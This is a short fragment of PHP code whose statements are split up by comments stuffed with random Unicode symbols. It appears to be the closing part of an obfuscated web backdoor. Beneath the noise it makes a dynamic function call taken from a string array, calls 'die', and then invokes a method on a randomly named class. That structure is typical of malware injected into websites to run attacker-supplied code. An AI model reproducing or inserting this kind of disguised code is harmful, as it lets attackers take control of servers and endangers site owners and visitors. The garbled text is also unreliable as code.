] /*-3<uEx`k[-*///
. /*-U~7-*///
$pvSzKcFYhX/*-


⊠⅖︸≒㊬≩⊍▹➥┒£∨④⋘┠∯□╞┬⇟﹩↶┐☐Ⓩ


5@9D⊠⅖︸≒㊬≩⊍▹➥┒£∨④⋘┠∯□╞┬⇟﹩↶┐☐Ⓩ


-*///
[/*-{-*///
1+3/*-

☠⓴⑱↸┊✴↋⚘├⒙☧≷⓼✷╋∙≭➎┏┆▕

0]s!r|xTIl☠⓴⑱↸┊✴↋⚘├⒙☧≷⓼✷╋∙≭➎┏┆▕

-*///
]/*-UBy;+-*///
(/*-$v-*///
$BcVb/*-!dnB1-*///
)/*-Z{1P-*///
 . /*-n],&CMfR-*///
$pvSzKcFYhX/*-Bx-*///
[/*-


❧╣▴⑶ℑ❑


GO%Z❧╣▴⑶ℑ❑


-*///
4+4/*-{-E39-*///
]/*-q%-*///
);/*-
№≕↭⊨√ⓙ☋㊖╕Ⅾ╟⇋⇤↝❼╖◻≹◗
X[+>[`TwB№≕↭⊨√ⓙ☋㊖╕Ⅾ╟⇋⇤↝❼╖◻≹◗
-*///
/*-
✥∹⒟∱∧▰♖⊿︻⊘♕⇛㊰﹟➘♬⓯㊃Ⓨ≾㍿︼┻▐┽﹣╬⊉⊈◲┺
3^(✥∹⒟∱∧▰♖⊿︻⊘♕⇛㊰﹟➘♬⓯㊃Ⓨ≾㍿︼┻▐┽﹣╬⊉⊈◲┺
-*///
die;/*-


⅘▇¶☻⇉⋬⒤↺↯㊦◇‿✝㊞ℒ≠


|FLe⅘▇¶☻⇉⋬⒤↺↯㊦◇‿✝㊞ℒ≠


-*///
 endif;/*-?:#OLrt|Y-*///
 }/*-

∲⇎✣ℭ✏▆㈧┨◱㈤⋪◉/☶︺➤∋⇁②❼㊫↶┒

%E@∲⇎✣ℭ✏▆㈧┨◱㈤⋪◉/☶︺➤∋⇁②❼㊫↶┒

-*///
}/*-
┺⊸☰Ⅷ❿⋝㊌ⅰ⒌⇟Ⓚ↩⒅☨
R_<5┺⊸☰Ⅷ❿⋝㊌ⅰ⒌⇟Ⓚ↩⒅☨
-*///
Cy/*-_jcj(5HJ-*///
::/*-$,2[b6-*///
hDkxQczeK/*-


卐♓㊌︺¥┵∾^‡Ⓠ∔⊽〓∦≾≒﹣↾▷➹◝◔╠⓹╔⊌⚘▍☊∌


b93^#,卐♓㊌︺¥┵∾^‡Ⓠ∔⊽〓∦≾≒﹣↾▷➹◝◔╠⓹╔⊌⚘▍☊∌


-*///
();/*-

↻⌖☍⊺℉╨◯⒝◃≛⋈～✈Ⅻℜ÷⇖☩㈥Ю∻㊌⋦⇨

xA:(,↻⌖☍⊺℉╨◯⒝◃≛⋈～✈Ⅻℜ÷⇖☩㈥Ю∻㊌⋦⇨

-*///
 ?>